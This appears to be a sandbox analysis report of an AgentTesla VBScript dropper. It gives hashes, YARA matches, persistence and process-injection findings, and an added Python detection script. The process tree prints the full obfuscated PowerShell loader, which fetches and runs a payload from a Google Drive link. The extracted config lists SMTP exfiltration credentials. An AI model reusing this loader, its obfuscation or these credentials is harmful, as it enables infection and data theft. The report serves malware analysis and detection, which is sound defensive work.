Analysis

max time kernel: 145s
max time network: 140s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
submitted: 30-04-2024 01:36
Static task: static1
Behavioral task: behavioral1 (Sample: SWIFT Copy000224042024-pdf.vbs; Resource: win7-20240220-en)
Behavioral task: behavioral2 (Sample: SWIFT Copy000224042024-pdf.vbs; Resource: win10v2004-20240419-en)
General

Target: SWIFT Copy000224042024-pdf.vbs (a VBScript dropper; the "-pdf" in the name is a lure, the file is a .vbs)
Size: 34KB
MD5: ec0b0c5aca480e26979b6d7dda8cbb14
SHA1: a98b3addf15724c049e1f2e44a071df9e7b0df21
SHA256: d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170
SHA512: b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713
SSDEEP: 384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42
Malware Config

Extracted family: agenttesla
Protocol: smtp
Host: mail.cash4cars.nz
Port: 587
Username: [email protected]
Password: logs2024!
Email To: [email protected]
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) and credential stealer written in .NET; this sample's extracted config exfiltrates over SMTP (see Malware Config above).

YARA matches on memory (2 IoCs per rule)
Every rule below hit the same two memory regions of wab.exe (PID 2760), i.e. the payload that powershell.exe (PID 2884) wrote into wab.exe (see SetThreadContext and WriteProcessMemory below):
  behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp
  behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp

INDICATOR_EXE_Packed_GEN01 - Detect packed .NET executables. Mostly AgentTeslaV4.
INDICATOR_SUSPICIOUS_Binary_References_Browsers - Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL - Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion.
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID - Detects executables referencing Windows vault credential objects. Observed in infostealers.
INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store - Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.
INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients - Detects executables referencing many email and collaboration clients. Observed in information stealers.
INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients - Detects executables referencing many file transfer clients. Observed in information stealers. (Rule name as reported, including the spelling "Referenfces"; match on the exact string.)

Blocklisted process makes network request (3 IoCs)
flow  pid   process
3     2924  WScript.exe
7     2612  powershell.exe
9     2612  powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description      process  ioc
Set value (str)  wab.exe  \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe"

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
(no IoC details were captured for this signature)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
15    ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
pid   process
2760  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid   process
2884  powershell.exe
2760  wab.exe

Suspicious use of SetThreadContext (1 IoC)
description                          pid   process         target process
PID 2884 set thread context of 2760  2884  powershell.exe  wab.exe
Together with the WriteProcessMemory and MapViewOfSection entries below, this is the process-injection (hollowing) pattern: the 32-bit powershell.exe maps and writes the payload into a freshly started wab.exe and then redirects its thread; the hidden-from-debugger thread flags and SeDebugPrivilege in both processes are consistent with that.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (5 IoCs)
pid   process         count
2612  powershell.exe  1
2884  powershell.exe  2
2760  wab.exe         2

Suspicious behavior: MapViewOfSection (1 IoC)
pid   process
2884  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description              pid   process
Token: SeDebugPrivilege  2612  powershell.exe
Token: SeDebugPrivilege  2884  powershell.exe
Token: SeDebugPrivilege  2760  wab.exe

Suspicious use of WriteProcessMemory (20 IoCs)
description                       pid   process         target process  count
PID 2924 wrote to memory of 2612  2924  WScript.exe     powershell.exe  3
PID 2612 wrote to memory of 2508  2612  powershell.exe  cmd.exe         3
PID 2612 wrote to memory of 2884  2612  powershell.exe  powershell.exe  4
PID 2884 wrote to memory of 780   2884  powershell.exe  cmd.exe         4
PID 2884 wrote to memory of 2760  2884  powershell.exe  wab.exe         6
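The signatures above describe one chain: WScript.exe (2924) runs the .vbs and spawns 64-bit powershell.exe (2612), which relaunches a SysWOW64 (32-bit) powershell.exe (2884) that writes into and sets the thread context of wab.exe (2760); wab.exe then adds a Run key under AppData\Roaming and resolves ip-api.com. The following Python is an added example, not part of this report or of any vendor's tooling, of detection logic for that chain run over constructed Sysmon-style events that mirror the report's PIDs. The event list is constructed (field names follow Sysmon's process-create, registry-set and DNS events), the rule thresholds are the author's, and attributing the ip-api.com lookup to wab.exe is an assumption: the report records the flow, not the originating process.

```python
"""Detect the WScript -> powershell -> SysWOW64 powershell -> wab.exe chain,
Run-key persistence into AppData\\Roaming, and an external-IP lookup."""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
HOLLOW_TARGETS = {"wab.exe"}          # the signed host abused in this report; extend from your own telemetry
IP_LOOKUP_DOMAINS = {"ip-api.com"}

# Constructed Sysmon-style events (EventID 1 = process create, 13 = registry
# value set, 22 = DNS query) modelled on the report. PIDs are the report's;
# the DNS event's source process is an assumption; the last event is a benign
# control (an admin starting PowerShell from Explorer).
EVENTS = [
    {"EventID": 1, "ProcessId": 2924, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WScript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"'},
    {"EventID": 1, "ProcessId": 2612, "ParentProcessId": 2924,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WScript.exe"},
    {"EventID": 1, "ProcessId": 2884, "ParentProcessId": 2612,
     "Image": r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "ProcessId": 2760, "ParentProcessId": 2884,
     "Image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "ParentImage": r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 13, "ProcessId": 2760, "Image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "TargetObject": r"\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile",
     "Details": r"C:\Users\Admin\AppData\Roaming\newfile\newfile.exe"},
    {"EventID": 22, "ProcessId": 2760, "Image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "QueryName": "ip-api.com"},
    {"EventID": 1, "ProcessId": 3300, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, reason) for every event that matches one of the rules."""
    hits = []
    for e in events:
        if e["EventID"] == 1:
            img, parent = basename(e["Image"]), basename(e["ParentImage"])
            if parent in SCRIPT_HOSTS and img == "powershell.exe":
                hits.append((e["ProcessId"], "script host spawned powershell.exe"))
            if (img == parent == "powershell.exe"
                    and "\\syswow64\\" in e["Image"].lower()
                    and "\\syswow64\\" not in e["ParentImage"].lower()):
                hits.append((e["ProcessId"], "64-bit powershell.exe relaunched itself as 32-bit (SysWOW64)"))
            if parent == "powershell.exe" and img in HOLLOW_TARGETS:
                hits.append((e["ProcessId"], f"powershell.exe spawned injection target {img}"))
        elif e["EventID"] == 13:
            key, value = e["TargetObject"].lower(), e["Details"].lower()
            if "\\currentversion\\run\\" in key and "\\appdata\\roaming\\" in value:
                hits.append((e["ProcessId"], "Run key persistence pointing into AppData\\Roaming"))
        elif e["EventID"] == 22 and e["QueryName"].lower() in IP_LOOKUP_DOMAINS:
            hits.append((e["ProcessId"], f"external IP lookup via {e['QueryName']}"))
    return hits


def ancestry(events, pid: int) -> str:
    """Walk ParentProcessId links back to the first process we have no record for."""
    parents = {e["ProcessId"]: (e["ParentProcessId"], basename(e["Image"]))
               for e in events if e["EventID"] == 1}
    chain = []
    while pid in parents:
        ppid, name = parents[pid]
        chain.append(f"{name}({pid})")
        pid = ppid
    return " <- ".join(chain)


def report(events):
    """Group hits per process and key them by the process's ancestry chain."""
    by_pid = {}
    for pid, reason in detect(events):
        by_pid.setdefault(pid, []).append(reason)
    return {ancestry(events, pid): reasons for pid, reasons in by_pid.items()}


if __name__ == "__main__":
    for chain, reasons in report(EVENTS).items():
        print(chain)
        for r in reasons:
            print("   -", r)
```

The chain rule (powershell.exe spawning a signed host such as wab.exe) is the one that survives renaming: the script names, the Run value name ("newfile") and the staging file all change between campaigns, while the injection target and the SysWOW64 relaunch are fixed by the 32-bit payload.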
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. 
U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. 
TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 
3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. 
U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. 
TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 
3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts 